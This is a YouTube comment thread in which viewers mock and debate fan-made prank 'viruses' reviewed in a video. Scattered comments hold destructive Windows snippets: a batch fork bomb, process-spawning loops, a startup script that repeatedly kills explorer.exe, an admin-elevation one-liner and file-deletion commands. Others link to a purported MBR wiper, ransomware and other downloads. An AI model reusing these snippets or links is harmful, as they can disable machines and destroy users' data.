@@malwaretestingfan Hey my guy never responded lmao... Yeah it was the HTA one... it was a pretty good fake at the time before Fly’s (i think he made it idk) Bluescreen Simulator v2.
It is honestly. Like it's not great malware but its a prank virus so its not really made to be amazing. I think it's definitely above average for what its made for though
I made something like that 2 years ago and I’m ashamed of it. Legit how he or she did this: 1. Downloaded a fake BSOD off the internet and edit it (it’s really easy to edit) 2. Actually code it by copying things off other you tubers.
It works only on Windows 10 because if you kill svchost.exe process you get Critical process died BSOD but in Windows 7 or in 8.1 it basically locks windows using
@@kalielsantos5986 it's not classic shell. there are ui elements that are inconsistent with Windows 10, and one of the applications even said that it was running on Windows 7 Ultimate.
The Death Virus was cool. I can imagine myself downloading it witouth knowing and panicking, only to cry myself to sleep and in the next day boot my computer and see IVe BeEn PrAnkEd
@@KSPAtlas I've used that before to elevate a batch file. Of course, malicious batch files that actually do real damage would be trojans usually, not viruses. Viruses infect programs.
@@klkkloreklffd i do not think bat2exe advanced is even legit, anyways it is a fricking good program, needs to be improved.. and i do not think anyone can stop me from doing that
the all malware sent is fake. reasons: 1. people just write crap in batch and then expect it to work as a renamed executable 2. they are shit coders 3. they can't just learn to get their program to interact with the file system at all
@@klkkloreklffd if you stopped responding to him he would stop responding to you but its really a concept that only a genius could understand and you're the only person that will never understand
@@klkkloreklffd iExpress is bat2exe integrated into Windows. Bat2Exe converter is no longer available on Internet. Advanced Bat2Exe converter is not free
@@capitalists1526 because i am creating an application through visual studio, i want to make a simple game and test my skills by myself only. not even 1/10th of it is finished
@@HouraisanShijuunana mastered it? What do you mean by that? Are you at the stage of making operating systems and device drivers? Or maybe making 3D graphics engines or emulators?
@@eter9nitysslut131 you can, to create models or guis but roblox can run it, c# is for my models (if it fail, i use lua) and c++ for gui (if it fail, i will try again but if i fail it again i will try to use lua to create roblox gui)
@@eter9nitysslut131 gui means graphocal user interface which have some buttons, i am a simple roblox developer and i use c++ and c# for creating guis in my game. guis contain buttons that you can click and still use c++/c# (depends on what gui for the model [yeah, spawning the vehicle] i am creating)
@@HouraisanShijuunana its not easy to be mastered lool. It's what the os your using is built on. it only takes 2 to 5 lines to print hello world in c++ but in assemblyxx86 its 16 xD
@@barneytheolddogs944 lua is easy, try making a world in roblox studio and put some script from toolbox, C# or C++ is a good option for roblox (yes it can run) and watch some lua tutorials (5 mins to 10 mins)
@@HouraisanShijuunana yeah i started on java last week for minecraft coding, its pretty powerful. but i havent really mastered it yet to the point i can make cool stuff happen
@@domokoa Its better than nothing and still teaches you everything you need to get started with another one. But one rule I like to go by is; All modern programming languages are powerful and can accomplish anything, just some of them are harder to get there than others.
I would suggest starting with Javascript or Python, both are very user friendly and have amazing community support.
Step 1 (Host) [win key] + r Step 2 (Host) C:\Windows\Web\ Step 3 (VM/Host) Drag and drop the image you want but make sure you have VBox Addons and drag and drop on Step 3 (VM) Right click and Set as Desktop Background Done :)
My grandma installed malware from a site saying her computer is infected and it was a adware. I went into task manager, opened the flie location and opened the details and disabled the tree diagram. I then uninstalled it. The most stupidest malware out there and hackers.
Sorry to burst your bubble, but Java runs on JVM, which runs Java bytecode. Maybe you can do it by abusing JIT compiler of JVM (whatever that is), or you can use JNI (but you also need to use C/C++ with long Java_com_xxx and reflection-oriented mess, try to convert any functional Java code into JNI without referencing any compiled/bytecoded form of it ) Also, every OS has different APIs, so crossplatform "viruses" are out of consideration.
Reminds me when I wrote a crappy trojan in batch script. Mine actually did damage though by disabling a bunch of Windows features with group policy by extracting a .reg file from its body and running regedit silently. I don't know why someone would think that a .bat file was similar to a .exe file when they are obviously different formats, nor would I upload anything I make to the internet for cheap fame. I'm not an expert, but I can write better batch scripts than most of the samples you've tested here. Many of these "samples" were created by people who probably only know like one command in the whole language.
Also, if one is going to write any script, they should test it in a virtual machine.
@@PyPylia or yoU could do :loop Start Goto loop This can also be made so a message or a command can be reapeted Such as @echo off :loop Echo <message> Start Goto loop
And desktop deleter repeater @echo off :bbd rd desktop :: Make sure your in your usernames folder, For example my name is melon and my username is melon Start Goto bbd
There fixed your code, now you can execute it from any program in any directory with any name, also @echo off isn't necessary for this as it doesn't matter if the user sees it or not.
The only issue was our school computers were so shit that .bat files that would open loads of software could sometimes kill the PC, I don’t know how but it was funny af
If I would make a Virus I would do a real one wich would has important things in it: - Keylogger - Encryption of all files (maybe) (and with decrypter) - Replacing in reg edit the explorer with my virus (to not see explorer not come up it starts then explorer) - Disabling CMD and Regedit - And anti close (2 task system 1 task ded = System BSOD) - And maybe more DISCLAIMER : I WOULD NOT DO THIS AND IF ONLY FOR ENDERMAN OR PEOPLE WHO WANT STH LIKE THIS ITS NOT ON PURPOSE TO DESTROY COMPUTERS
2:48 - Correct me if I'm wrong as I'm not well versed in batch commands, but "restart -1" doesn't even look like a proper batch command, so it would've had an error as a plain batch file, too.
The best "vIrUs ecks dee haha scary danger" I've made is a 3-line batch script that repeatedly opens terminals that ping google 10 times then exit. I made it to see how much I can cap my network connection, it went from 90mbps to 30. The real side effect though was that my IP was flagged as a botnet and I would get captchas for the next 6 months.
@@兽Arufisu Bash is not a programming language it's actually a command prompt in linux but you can make scripts for it with the #!/bin/bash tag at the beginning of a new file
@@poobie_ No it doesn't. That's the funny part. First, it sends an error that you can't delete it because access denied. Next it runs the "restart" command.... Which doesn't exist. Then it outputs an empty line to the screen. And exits immediately. So even if you renamed that .exe file to a .bat, it actually wouldn't do anything to your computer.
Replace t.run"cpuheater.vbs" to t.run(WScript.ScriptFullName) That should allow it to be executed from any folder (like in CMD or something) or even different names [Note: Haven't tested it, probably doesn't work, I can't be bothered to start up my VM for that garbage]
Virus creator: okay were gonna make this not such a bad virus but still make it affect the computer Me:*if your gonna make a not harmless virus then just make it a application* virus creator: *confusion*
Pffff imagine that some time into the future all kinds of viruses and malware that can attack Windows XP/7 will not be able to work because it simply can't run on such old operating systems!
Idk why codes are so hard to learn, can people make them like it? Start Get_up(from_bed) Go_to(kitchen) Sit_in(chair) (If_no_food_(go_to_Start)) (If_food_on_table) Start_eating Take_spoon Eat Go_to (Start_eating)_repeat_10_times Go_to(bed) Start_sleeping Sleep Sleeping_until_mom_cooks_food
I have an extremely annoying virus, Create a batch file and do a script to move it to the startup items folder, then do the taskkill command for “explorer.exe”. This will break their computer and force them to restart, but when they log back in, it just forces them to restart again! I recommend cu try it! ;-; also don’t forget to do /IM, /T and /F. Anyone who uses this script please give me some credit!
Top 2 working .bat visuses garbages: 1) :x start explorer.exe goto x (Epilepsy alert, lags alert) 2) :x start wininit.exe goto x (-Program- garbage starts system procces which already exists, and this causes Windows to close one of them and activate BSOD trigger.)
how u got like in the application and the upper border where is X minimize and these how ur buttons like closeing (X) button is connected to the up and its big? i have windows 7 ultimate as well and the buttons are like wide square boxes that are not ''connected'' pls help and how to get blue theme color in windows 7 please do tutorial for me
Ender how can I send you my program? (This time not virus, only fun program, I tested it and it works, I made it in C#) Am I supposed to just put download link in the comments or how?
Me, a normal dude programming random things: maybe I can program a virus too... but im only gonna make in work in windows 10 8301, never gonna test it, write it in a programming language I suck at, make it like 5 lines big and send it here
The only "virus" I can make without searching for it is a little thing in notepad that counts down from 3 and literally just shuts your pc down. But at least it is something :/
Death Virus.vbs Inputbox "Enter Password" Wallpaper Virus Paint.png X=Msgbox ("Prank") Death Virus.bat echo deleting files... echo This won't take long...
Imagine being one of his subscribers and trying really hard to make something good only to have said YouTuber make a video talking about how much your thing sucks
Oh ya, these look like trashes. Plus I have a few comments about all the malware made in this video.
1. MINDYOBUISNESS: It seemed that the publisher made the buttons to show up message boxes.
2. BlueBooter: The name of the BlueBooter seems to have been related to the Blue Screen Of Death (BSOD)
2A. Which windows OS will make the directory "C:\Desktop" to make that as a default desktop location?! The right one is "%Userprofile%\Desktop"
Note: %Userprofile% is also related to C:\Users\%Username%\
2B. Killing svchost.exe process won't make the computer display BSOD, instead make almost all of a application components won't work or make the CTRL+ALT+DEL combinations will not work. In windows 10, it will make the computer freeze.
3. CMDspam: Command Prompt Windows won't make the computer really unusable, It will only make it freeze. (If those windows reached the maximum process numbers)
4. Installer
4A. People can't write in batch and rename it to an executable. Compile it is a better choice or stay with the .bat extension
4B. People cannot even delete all the windows files even when they even login as adminstrator.
4C. The restart Command doesn't exist, try the command "Shutdown -r -t (Your own time before the computer restarts)
5. Death: Cool
6. Joke.Win32.Win2xUpgrade: Most windows doesn't come with the powerpack installed.
Hey, I have a psexec based virus running in the recycle bin. It's pesky, and it is untouchable (even by admin cmd recycle empty commands). Luckily Sophos stops the malware from calling out to the internet to whom ever wrote it. How the hell should I get ride of it? Even Sophos can't manage it, only stop it from calling out.
CMD spam did have a necessary elevation because that person sat at his desk and thought: “Hmmm... I KNOW! Let’s make an program that spams cmd’s and is so inconsistent that half of the cmd’s are elevated and the other half aren’t!”
I might send my own version of curfun.exe (forces you to type “LOL” every 500 milliseconds and moves your mouse to a random location, also every 500 milliseconds)
once in primary school i created this thing in vbs for the IT teacher but let's just say he deserved it. dropping the file on his computer was easy as the whole class was on an unlimited network so I could just pass files to whoever I wanted. Anyway, here's the code: Set objFSO = CreateObject("Scripting.FileSystemObject")
set shl=CreateObject("Wscript.shell")
WScript.Sleep(100000)
counter = 0
shl.run "www.youtube.com"
do
WScript.Sleep(10000)
shl.run "www.youtube.com"
counter = counter + 1
If counter = 5 Then Exit Do
loop
strScript = Wscript.ScriptFullName
objFSO.DeleteFile(strScript)
(obviously you could replace www.youtube.com with some other websites and also you could vary the counter and the time it takes between the openings)
The person who made the death "virus" definitely tried! If i downloaded that i would actually be scared tbh. I think it would be a good way to prank people who don't know much about how viruses and all the mal/ad/spywares work!
Some months ago, i wanted to be a programmer, but when i looked at a single script and developing program, i changed my mind. It's just too hard i don't understand anything
If you check my channel in about 2 months I will try to post on how i tried to make malware and you guys should load it up in a Virtual Machine ( I did it on my old trash laptop that i didnt have any files on). would not recommend running on your personal or work computer. It's badly made but dangerous. NOT A JOKE
I cmdspam once and posted it in the chat while I was in class, they thought it was a virus. (They didn't realize it was me because I sent it from a fake account)
Yeah you can do that, i did that. Just use mingw compiler then DAD the files into the vm or use dd to create an image file to use as cd or usb or whatever
How to use virtual machine: Download Oracle VM Virtual Box or Buy one of VMware products, Then search on youtube "how to install [OS you want to install] on [VirtualBox/VMware]"
Hey Enderman! Im created a antyvirus on CMD, .bat file. He scanned a catalog on Desktop. This is the scanner .okolicy (test file) .bat .cmd .btm files. Name scanner: Kiol Defender Batch. To translate: Jeszcze go nie skończyłem, jak skończę, to prześlę go Tobie. Ważna uwaga: Nie pokazuj jego kodu na odcinku, ale sam możesz zobaczyć. Wykrywa on 5 typów zagrożeń: ransomware, destroyers, malwares, spyware, spammer Windows.
The classic virus :a start explorer goto a Machines with 2 GB of RAM will give up almost immediately If you replace start explorer with start chrome, then it’s even more amazing
Can you do an tutorial how to use Virtual Machine? I heard that if you dont setup it good the files you download in the VM can be transferred to your real pc. and the site where to also download the windows?
2:52. Bruh at least use an Bat2EXE. There’s one built in into Windows and you can legit make Batch files that use the tool of windows. If you gonna use crap, make it runnable. Maybe open up Recourse Hacker and add an icon if you gonna make a .exe that isn’t really a compiled executable lmao
2:48 rd c:\/s/q/a is not very intresting when all it does is deletes personal files only and deletes files that windows need to boot when you can't figure out how to allow access to all system files, restart is not a command and that is not how you use the echo commands!
yo the cmd spamer is what i like to do in school on my friends pc. when they say me to send them the work ive done i give them this little file which is made in 30 secs and the y hate me for doing this xD
enderman shall keep dissing 11y old virgins till theres this one kid who gets angry at this video, wastes his entire life finding a vmware escape vuln, then punishes enderman and enderman shall be on his knees
Enderman :( How Can i send you a file like that i just wanted to introduce my Fake virus, but this is not a just virus i was inspired to make this virus because of you. =( plz Tell me How.
I think this script should be run with administrator privileges. I recommend to start by giving these 2 lines and save. The script should then work. This script also works on every Windows operating system, because you used cmd console and bat extension. I use the cmd extension and it does not work everywhere and the bat works everywhere. Here are 2 lines:
if not "%1"=="AdminPrivileges" (powershell start -verb runas '%0' AdminPrivileges & exit /b)
pushd %~dp0
I was just messing around and making a fake batch virus with vbs files that say an error occurred, and after I ran it, I taskkilled everything that used svchost.exe… bsod
Try editing an html file into < p>You have been hacked <p > (no space except the sentence spaces) And open it on chrome or something Simplest fake malware ever
Enderman:Why does everyone put virus Me:Enderman sit on a chair virus Enderman:WHAT DID I TELL YOU Me:What Enderman:Jumps off cliff Me:Uno reverse card Enderman:What happend Me: Enderman:Say something you dummy Me:Something Enderman:Not literally Me:ok Enderman:Your stupid Me:I'm gonna kill you Enderman dies Me:uno reverse card Enderman:THANKS ME:SIT ON IT NOW ENDERMAN:NO
Just add time stamps into the description of the video, but make sure to include 0:00 . If it doesnt work for you, just look at the description of this video
Привет Эндермен, и ты.... РУССКИЙ? Или ты просто его знаешь? Или ты вообще в какой-то из стран СНГ? (Hi Enderman and you .... RUSSIAN? Or do you just know him? Or are you even in some of the CIS countries?)
I remember a malware and it called "Selena Gómez sexy hot" and that shit if was in the computer and put a drive the drive get the malware for infect more pc
2:48 Let's just ignore the "rd" line, but...... DOES WINDOWS HAVE COMMAND CALLED " RESTART " IN CMD? I thought Microsoft's engineers will cry out loud after seeing that line of command...... XD, SO F--KING GENIUS, HUH?
1:02 batch. is not. the loveliest programming language. it gets mad at everything for literally no reason. hmmm... maybe i should make a not trash malware sometimes for the fun of it
@@watermelown2536 i know it was a joke but i added a new disclaimer to it just for you and, yes, batch is easy. too bad that doesnt fix the fact that it often breaks for seemingly no reason
someone send me some .bat file with the same codes even though I wasn't dumb cause I know what did it mean. I checked the file's script and not only it had to restart my computer but also lock it... Btw I got that file from a random guy on discord saying it's minecraft acc generator even though I already have a very old premium mc account
Enderman In Minecraft Sees A Yt channel that explores Windows:Wait That's Illegal Make Sounds Enderman Kills the minecraft enderman:Lol Minecraft enderman sucks im the best
2:50 serously........... RESTART??!!! pfft, as if that is even a command. that guy doesnt even know how to restart a computer using a batch file, when he could of gone `shutdown -r -t 0` anyway, someone who has never used a computer could write that
Here you can submit wirus for me to test as well. Not literally here because of YT. I will have instructions soon. Disclaimer: I am not affiliated with Enderman.
@@fegelein9428 i tested it on VMware, sometimes in Windows 7 VM get a error like MBR corruption and i'm spanish so my English sometimes will be bad and i don't know where to share it because someone download it and execute it on a real PC (That's so stupid) but someone can do that and destroy a Physical Computer
I was waiting so much for this moment and try to send it to enderman
Wow, seriously, try to make decent viruses... I may be no expert at low-level programming, but I know a bit of Batch and Powershell, and some of that is just really bad programming...
I have created better viruses but o have only low experience. It taskkill Explorer.exe but i can create delete Explorer.exe virus but "every virus can be terminated" PS:sorry for my english
The win2 one tho lmao. It seemed like an attempted at least. Until the first click. The best is the “Death Virus”, not saying it was good tho. Just nice tried
This is some crap malware my friend made, it's better than this malware, but if you ever want to clear an MBR based windows work computer while having administrator privileges do this: https://pastebin.com/NRwddTcW. It will not work on GPT. It will not work without administrator privileges. It will work without the user pressing yes on UAC (as it bypasses it) It does not clear the drive, only set's it to not bootable.
Bruh I can make one of those virus and how to execute, its very easy to make them, Because I use vbscript, and a couple of javascript (yeah just learned it when I was 11 yrs old -.-)
I created better virus it only taskkill Explorer.exe but i can create delete Explorer.exe virus, it looks better! Your computer has been unusable if you delete explorer.exe
Imagine making fun of others creations like your a god yourself some of them weren't half even that bad for them being a joke. Def won't be watching your channel lmao
Non trash malware that can damage computer if on enough 1: %0 | %0 2: @echo off Title RIP
:X Echo rip! Start calc Start cmd Start control Start notepad Goto x 3 (requires 2 files 1 a .bay file another a .vbs) .vbs (let’s name it rip1) X=msgbox(“OH DAMN!” 0,16 “rip!”)
.bat (let’s name it Oof!)
@echo off Title oh no!
:x Start rip1 Goto x
4 forces you to play minecraft lol:
@echo off Title PLAY MINECRAFT!
:x Start Minecraft launcher Echo PLAY MINECRAFT!!!! Goto x
This is unacceptable. These people made you these samples because they wanted you to test them, not for you to make fun of it and just bully them for it. You’re using your fame as an excuse for insulting and bullying, which is wrong. Utterly wrong. You think that because you’re popular that these people who put the time into making this won’t question you for bullying them. You’ve probably affected these poor people’s lives to the point of no recovery. You should be ashamed of your actions and in future, don’t exploit people who have took the time to make these samples for you to test. Disrespecting your fans like that is horrible treatment and you shouldn’t do it again unless you want to severely damage your reputation. You don’t deserve the 1000 likes you asked for and nor do you deserve that many subscribers.
Why can't you read the desc. properly? he said Sorry! Are you gonna read the desc. again and fix or delete or just leave the Wasted-Time-Comment you commented?
I feel like less than 10% of people on the internet actually know what an actual "Virus" is because there is a difference between a Virus, Malware, and other things like that.
Your a terrible person I’m sorry if it’s a joke but they tried so shutup no one cares about your option that much they just wanted to show you it and they wasted there time on you but once again if this is a joke your not funny if not still just be quiet loser
Why do people call everything a goddamn virus, I've seen these on other websites im pretty sure they downloaded it and gave it to you. the closest thing to a batch virus is MS2
Pfft give me a few days and I will give you something cool and have it actually fuck up your vm the command prompt spamming shit virus looks like what I made in middle school then tricked a few teachers to open it and flip the fuck out as well as having it run on startup so it was actually 20x better then that shit
ТЫ НЕ ГОВОРИШЬ ПОТОМУЧТО БОИШСЯ АКЦЕНТА КОГДА В ВИДЕА ТЫ ГУГЛИЛ СКАЧАТЬ ЧИТЫ ДЛЯ МАЙНКРАФТА ПОИСК БЫЛ РУССКИЙ ХОТЬ ТЫ И ПИСАЛ НА АНГЛИЙСКОМ ПОТОМУЧТО ТЫ СКАЧИВАЛ ВИРТУАЛЬНУЮ МАШИНУ С РУССКОГО САЙТА И У ТЕБЯ РУСКИЙ ЯЗЫК НА ОСНОВНОЙ ПК. UPD: ТАКЖЕ У ТЕБЯ В РЕК. КАНАЛАХ СТОИТ 1 РУССКИЙ ЧЕЛ - СОВПАДЕНИЕ, НЕ ДУМАЮ! UPD2: У ТЕБЯ В ТВИТЕРЕ ЕСТЬ ПОСТ НА КОТОРОМ ЛЕЖАТ МАРМЕЛАДКИ "НАБОР МАРМЕЛАДОК" НА РУССКОМ! UPD3:
I will make a virus that deletes all the files except system 32 And spams every single application on the computer and moves the mouse by it self It multiplies itself and infects everything then connects to your wifi then the server And get transmitted to other computers
Okay so I just came across this video, and I absolutely think that you were absolutely a dick in this video. Many of these people were rather young, and I'm sure that you and many others did something extremely similar to this.
There was absolutely no reason to harp on these people. While I understand that they shouldn't be exempt from criticism, there's a difference between criticism, and just shitting on them and the creator. What you did was the latter; you should know better than this, Enderman.
how to hate your fans tutorial 101. Don't get me wrong, this malware is not good, but at least have respect to your own fans. They made you famous, and now you are just shitting on them, editing their messages to mean things.
Hi i just post a comment a few weeks ago on a ransomware that i create (with download link) And I'm back with c# virus that i made in a few minutes (15-30 minutes) . Hope you will enjoy it ! He can't do anything to your computer but if you are too late your going to have to turn your PC OFF with power :( .... Just save all your files before run it so anything can be loose in case of PC restart ... There is the Download Link : https://mega.nz/#!KvpzUaga!huhtjsGwjZdk1xCdCpVBAIJvT48iLciEIGySI2DdCJ8 Password : jpkgbsjipze=iàeafkop^sd Enjoy <3 !
Do you know how to make the shittiest """""malware""""" or a """"""""''virus""""""""""? 1. Make a new text file. 2. Write in it "echo Screw you" 3. Save it as .bat format 4. Voila! Now you can spam Enderman all day so he would check ur """""""""""""""virus""""""""""""""" and you will get a shout out and he will say ur virus is da best (jk in ur dreams lol) and you'll get featured.
enderman i created something can you do it in a video like this too (have to open as administrator for it to work i think) heres the file https://drive.google.com/file/d/1hfR-7kxvNr-IPhlMyVflS9OsmxlkV55v/view?usp=sharing HEY is see you want to look down there HEY IM TALKING TO YOU only look down there if you have problems with the file HEY I SAID ONLY
if you have a proble with this programm take this: before you open the file open another cmd with taskkill /f /im cmd.exe and when you run the file make sure you have your own cmd window far away from the files cmds so you can easyly execute the taskkill
ok i have made changes to the file it will crash every pc if you dont watch out your pc might actually crash https://drive.google.com/file/d/1hfR-7kxvNr-IPhlMyVflS9OsmxlkV55v/view?usp=sharing 1 more thing make a .bat with taskkill /f /im cmd.exe and reopen it untill everything is gone run this file as admin for it to work fully
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQ
UAL^</p^> >> bsod.htaecho. >> bsod.hta
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
Kids on youtube: HOI I VANT TO GIV U A VIRUS SUPLE UNDERMON HIRI IT IS:www.crappy2007sharingwebsitewithads.com/file/HGHGHGHGVIRUS.exe Me:Looks like a kid want to send to enderman his virus. I'm
curious! Me:*looks in source code" Code: @echo off echo U HIAVE A VARUS HHI9HI9HIHIHIHIHIHIHIHI MSG * FORMATT UR HARDDIASK MSG * uPen note pad MSG * win dows is dun del c:\windows\system32 echo dun ur pc iz treshed shutdown -r Me:THIS IS t r e s h In the video Enderman:This is t r e s h deletes it Kid: https://www.youtube.com/watch?v=yBLdQ1a4-JI endarmun caled mi varus trash Kid:*cries*
Hello! I do not have any Mail.ru accounts, but sinceretly, I want you to try out the malware (maybe trojan) I finished one week ago. Tested on Windows NT 6.0, 6.1 (Vista & 7) It's on batch, so I call it garbage. 😅 Anyway, here's the link:
The "Death Virus" is at least, nicely made .
3231 likesReplies (49)
But- hold on WHAT!!
0 likesYes
0 likes@
0 likesVery True
0 likesI wish he put links
0 likesWhy every time you do these type of vids you don't include the link for for the "Viruses" like you always do in like (e.g. Spark.exe)
0 likes@Poly
0 likesyes, of course it is. I like it as well!
0 likesYour PFP looks like Xiaomi fastboot screen.
0 likesI agree
0 likesthe death virus is basically just a cliche ransomware
0 likesBut thats pranks
0 likesНет
0 likesYep
0 likesI wanna know code for Death virus
0 likesDeath virys is asking enderman
0 likesYES!
0 likes@@PolyTheDude me too
0 likes@@malwaretestingfan Hey my guy never responded lmao... Yeah it was the HTA one... it was a pretty good fake at the time before Fly’s (i think he made it idk) Bluescreen Simulator v2.
0 likes@@sacredsouljah stackoverflow
0 likes@@PolyTheDude He commented on one of my vids ikr!
0 likesYea
0 likesyes it was the best
0 likes@@PolyTheDude the justin y of malware is there a problem
0 likes@@PolyTheDude imagine a reply is 1 year later
0 likes@@PolyTheDude same😂
0 likesP I N N E D C O M M E N T
1 likeAgreed
0 likes@@PolyTheDude #deathvirus
0 likesWhat
yep
0 likesyes
0 likes@@PolyTheDude Oh so you're cursed too with another person. Welcome to the club!
0 likesIts pretty well made
0 likesWas about to comment that. :(
0 likesI want to try it miselft it seems very cool
0 likesYes yes yes
0 likesAnd death, says some words.
0 likeshello xiaomi bunny
0 likesyeah
0 likesI made it to my friends.... Is not my friends now XD
3 likesAgreed
0 likesI agree
1 like@@vf7675 How you can code a RAT using it?
2 likesDeath virus was the only "ok" one
27 likesIt is honestly. Like it's not great malware but its a prank virus so its not really made to be amazing. I think it's definitely above average for what its made for though
15 likes@@sacredsouljah I probably know the author. He used an HTA file, to do that.
3 likesI made something like that 2 years ago and I’m ashamed of it. Legit how he or she did this:
45 likes1. Downloaded a fake BSOD off the internet and edit it (it’s really easy to edit)
2. Actually code it by copying things off other you tubers.
@@malwaretestingfan why do i keep seeing you everywhere
39 likesYes.
46 likes„It works on Windows 10 only“
2273 likesEnderman: run it as windows 7
Replies (56)
@@CombatTesting you can’t get favourites drop-down on windows 10
0 likes@@mgod413yt3 there is onr little option called "Use small icons" that makes the start menu be positioned that way
0 likes@@kalielsantos5986 And how are you going to get the 3D Animations?
0 likes@@mgod413yt3 it's 7 cheap fuck
0 likes@@MacBack123 well like it's not that expensive for windows 10 it's like 25 dollars and windows 10 has been out for 6 years i think now maybe less
0 likes@@kalielsantos5986 No, StartIsBack
0 likes100000000000000000000IQ
0 likesİts a theme
0 likesMy windows 10 is not working
0 likes@@skywh you cannot change the uac prompt smartass,its windows 7 and go get some glasses, classic shell isnt that perfect
0 likes@@CombatTesting for you i have a question if you know its windows 10, why is the uac windows 7?
0 likes@Kuba IS WINDOWS 7 IS NOT VISTA
0 likesyes he are smort boi
0 likes@@someidiot4311 is Windows 99.1 because Windows 7 and 10 are note existing
0 likes@Gyper ShokYT ah yes a Spanish laugh, (i would know)
0 likesIt works only on Windows 10 because if you kill svchost.exe process you get Critical process died BSOD but in Windows 7 or in 8.1 it basically locks windows using
0 likeswhat happens if i dlowand windows 10 in intel atom? enderman: will crash
0 likesintel atom cant install windows 10 huh
0 likeswho cares
0 likesWe ♡ 7
0 likes@Gyper ShokYT bist du deutscher wtf
0 likesFyctf6cfcfyddtdfy7dfy7fyfffyffyf
0 likesjajajjaja
0 likesLol
0 likes@okoJBaticツ yall dumbass
0 likes#trasherror
well i have win9
1 like@@isteriko530 actually this is Windows 7. I can tell since the startup animation is WIndows 7's, not Vista's.
0 likes@@CombatTesting This is Windows 7, the startup animation is that of 7's.
0 likessrry but this is vista XD
0 likesРаботает только на Windows 10
0 likesEnderman: запустить его как windows 7
Stop!
0 likes@@mgod413yt3 2:16 IDIOT
0 likesVirus: bruh at least buy a windows 10 so i can destroy it for you
0 likes😭
0 likes@Gyper ShokYT pahaja
0 likesbobigamerxx 4:04 "Your Computer is currently running: Microsoft Windows 7 Ultimate @everyone is stupid its not win 10
1 like@Kuba Of Windows is 7
0 likes@Kuba Of Windows its windows 7
0 likes@@CombatTesting i'm using classic shell with windows 10 and its looking like windows 7 so you are right
0 likesShoote los
0 likesSometimes profound, sometimes absurd and 7, says some words.
0 likesoh hey windows 10? im gonna do it on the most glitchy windows 10 i ever used!
0 likes@@someidiot4311 found you
0 likeswindows 7 ded :(
1 like@@someidiot4311 Okay bro i don't care if it's Windows 10 or 7 i just wanted to comment,why does everybody attack me
0 likes@@someidiot4311 Okay tech einstein? (No offense)
0 likesY3a
0 likes@@someidiot4311 you would never known...
0 likesMaybe it's an Windows 7 Theme on Windows 10 Haha! Look at the background from windows 10,on masked windows 10.
0 likes(No offense)
lol
0 likesThat's Windows Vista
2 likes@jakub grabus Is 7
2 likes@RobloxianYT thats what he just said
0 likeslame
2 likes@@kalielsantos5986 it's not classic shell. there are ui elements that are inconsistent with Windows 10, and one of the applications even said that it was running on Windows 7 Ultimate.
79 likesClassic Shell
7 likesThe Death Virus was cool. I can imagine myself downloading it witouth knowing and panicking, only to cry myself to sleep and in the next day boot my computer and see IVe BeEn PrAnkEd
550 likesReplies (7)
Seems legit.
1 like@@Sheenoharu someone made it in the comments or he probably emailed enderman
1 likeWhere can I downloaded it
1 likeCause it was made by someone
1 likeI wonder how to make that
4 likesfonny
5 likesIkr
4 likesThat 'Death Virus' one is good.
309 likesReplies (5)
Can we have a link for it?
4 likes@Haffer_ It would turn to be a trojan, then, see what happened to DesktopPuzzle.
2 likes@@malwaretestingfan Joke programs can be made to lock you, if it doesn't damage the machine, its a joke.
4 likes@Haffer_ Yes. That was meant to be a joke program, so that was expected.
59 likesAgreed.
0 likesImaging renaming a batch file to an executable and thinking "OMG I MADE A VIRUS!!"
231 likesReplies (8)
@@JamesXylight or you just learn real programming and dont use windows api so your virus would atleast have a chance to work on linux
2 likes@@mediocreweirdo or just learn a real programming language and use win32 apis
0 likesHe probs typed like "echo Get hacked
2 likesdir /s
that’s why people should download a batch to exe converter
3 likes@@dozypleng Agree
0 likes@@KSPAtlas I've used that before to elevate a batch file. Of course, malicious batch files that actually do real damage would be trojans usually, not viruses. Viruses infect programs.
7 likesIexpress ftw
3 likesLmao these skids watch tutorials without understanding what he is doing and just puting shit together man
0 likes2:45 LOL RAW BATCH IN A .exe FILE
469 likesReplies (39)
ah yes .bat=.exe nothing could go wrong
0 likesba dum tss
0 likes🥁
@@IMAGE_NT_HEADERS oh ok
0 likes@@IMAGE_NT_HEADERS bruh
0 likesXDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
0 likes@@erimani4984 exactly
0 likes@@cst1229 but bat2exe is still 100 times better.
1 like@@klkkloreklffd IExpress is literally bundled in with Windows
0 likesiexpress and bat2exe work great, but has anyone ever renamed exe to bat? that shit still executes
0 likes@Raidz yes but exactly i got no idea if bat2exe advanced is legit
0 likes@@klkkloreklffd i do not think bat2exe advanced is even legit, anyways it is a fricking good program, needs to be improved..
0 likesand i do not think anyone can stop me from doing that
the all malware sent is fake.
2 likesreasons:
1. people just write crap in batch and then expect it to work as a renamed executable
2. they are shit coders
3. they can't just learn to get their program to interact with the file system at all
@@klkkloreklffd te
0 likes@@skedyt what
0 likes@@klkkloreklffd pencil
0 likes@@klkkloreklffd yeah, +with bat to exe you can request admin rights which can be useful sometimes
0 likesI did that when I sucked at pc but all along I could use a bat to exe converter
0 likes@@klkkloreklffd if you stopped responding to him he would stop responding to you but its really a concept that only a genius could understand and you're the only person that will never understand
0 likes@@unknownaccount4783 I don't care, stop responding to this comment.
0 likes@@klkkloreklffd but even if I disable it via registry, it will recover itself🤣
0 likes@@unknownaccount4783 Doesn't change the fact that it's still trash.
0 likes@@klkkloreklffd The only things it have detected are outputs of bat2exe's, and also something in old Office for Windows 3.1
0 likes@@unknownaccount4783 Windowes Defender is trash lol, detects literally anything as false positive.
0 likes@@klkkloreklffd That's av is Windows Defender...
0 likesRantendo Woah! Did you see that?!? It was the joke flying over your head!
0 likes@@unknownaccount4783 False positive, shit av.
0 likes@@klkkloreklffd my av is deleting exe from advanced batch to exe converter
0 likes@@unknownaccount4783 It is tho, why would you even pay for bat to exe anyways?
0 likes@@klkkloreklffd advanced bat to exe converter is not free
